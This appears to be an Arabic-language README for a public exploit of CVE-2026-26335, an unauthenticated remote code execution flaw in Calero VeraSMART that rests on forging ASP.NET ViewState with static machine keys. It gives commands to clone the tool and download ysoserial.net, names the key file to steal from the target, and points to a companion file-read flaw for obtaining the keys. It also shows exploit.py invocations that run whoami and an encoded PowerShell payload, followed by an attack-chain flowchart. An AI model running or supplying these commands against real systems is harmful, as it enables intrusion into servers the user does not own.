
استغلال آلي لثغرة CVE-2026-26335، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) حرجة غير مصادق عليها في Calero VeraSMART عبر تزوير ASP.NET ViewState باستخدام مفاتيح جهاز ثابتة. يتضمن اكتشاف نقاط النهاية، وتوليد الحمولة، وتنفيذ الأوامر.
محمد إدريس بن يامر باحث أمني
CVE‑2026‑26335 هي ثغرة حرجة لتنفيذ الأكواد عن بُعد بدون مصادقة في Calero VeraSMART (قبل إصدار 2022 R1).
يستخدم التطبيق مفاتيح آلة ASP.NET ثابتة ومشفّرة داخل الكود مشتركة بين جميع التثبيتات.
يمكن للمهاجم الذي يمتلك هذه المفاتيح تزوير ViewState خبيث في ASP.NET وتحفيز إلغاء تسلسل من جهة الخادم ← تنفيذ أكواد عن بُعد (RCE).
يقوم هذا الاستغلال بأتمتة:
__VIEWSTATEGENERATORCWE‑321 — مفاتيح تشفير مشفّرة داخل الكود
تستخدم تثبيتات VeraSMART نفس machineKey الخاص بـ ASP.NET:
<machineKey validationKey="STATIC_KEY"
decryptionKey="STATIC_KEY"
validation="SHA1"
decryption="AES" />
يمكن لأي مهاجم يمتلك مفاتيح من تثبيت واحد مهاجمة جميع التثبيتات.
git clone https://github.com/mbanyamer/CVE-2026-26335-VeraSMART-RCE.git
cd CVE-2026-26335-VeraSMART-RCE
wget https://github.com/pwntester/ysoserial.net/releases/latest/download/ysoserial.exe
المفاتيح ليست عامة. احصل عليها من الهدف:
C:\Program Files (x86)\Veramark\VeraSMART\WebRoot\web.config
أو عبر ثغرة قراءة الملفات المصاحبة:
CVE‑2026‑26333
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY --check-only -v
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY -c "whoami"
python3 exploit.py -t https://target-ip -vk KEY -dk KEY -e /Login.aspx -c "powershell -enc ZQBjAGgAbwAgAEgAYQBjAGsAZQBkAA=="
python3 exploit.py -t https://target-ip -vk KEY -dk KEY --proxy http://127.0.0.1:8080 -v
9.8 — حرجة AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
تم الإصلاح في VeraSMART 2022 R1:
حلول بديلة:
لأغراض تعليمية والاختبار المصرّح به فقط. استخدم فقط على الأنظمة التي تملكها أو لديك إذن بتقييمها.
محمد إدريس بن يامر باحث أمني
يوضح المخطط التالي سلسلة استغلال CVE‑2026‑26335 في Calero VeraSMART، حيث تسمح مفاتيح آلة ASP.NET الثابتة بتزوير ViewState خبيث يؤدي إلى تنفيذ أكواد عن بُعد.
flowchart LR
A[Attacker] --> B[Obtain VeraSMART machineKey]
B --> C[Discover ViewState endpoint]
C --> D[Extract __VIEWSTATEGENERATOR]
D --> E[Generate malicious ViewState via ysoserial]
E --> F[Sign payload with machineKey]
F --> G[Send forged POST request]
G --> H[ASP.NET ViewState deserialization]
H --> I[TypeConfuseDelegate gadget]
I --> J[Remote Code Execution on IIS]